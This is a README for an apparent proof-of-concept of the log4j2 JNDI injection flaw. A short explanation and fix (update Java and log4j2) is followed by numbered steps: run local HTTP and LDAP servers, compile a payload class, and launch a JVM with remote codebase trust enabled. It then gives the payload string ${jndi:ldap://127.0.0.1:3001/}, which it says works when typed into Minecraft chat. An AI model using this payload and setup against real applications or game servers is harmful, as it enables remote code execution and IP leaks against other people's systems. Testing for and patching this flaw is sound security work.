This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes)

However, the logging library for java called log4j2 had JNDILookup, which allowed access to protocols such as LDAP, which allowed code injection in older java versions.

Patched versions of java can prevent code injection, but JNDILookup makes request to ldap server, which can lead to IP leaks.

The solution is to update Java and log4j2 versions.

0. Install requirements

cd http-server && npm install
cd ldap-server && npm install

1. run http-server and ldap-server both

cd http-server && node index.js
cd ldap-server && node index.js

2. Compile Main.java

# This will generate Main.java - required to code injection.
javac Main.java

3. Start jvm with parameters

# You can still use log4j-client in repo for internal testing.
cd log4j-client
gradlew jar
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar

4. Send ${jndi:ldap://127.0.0.1:3001/} to any payloads. (In minecraft, just chatting this will work if exploits are working.)

• apache/logging-log4j2#608
• https://www.lunasec.io/docs/blog/log4j-zero-day/

CC0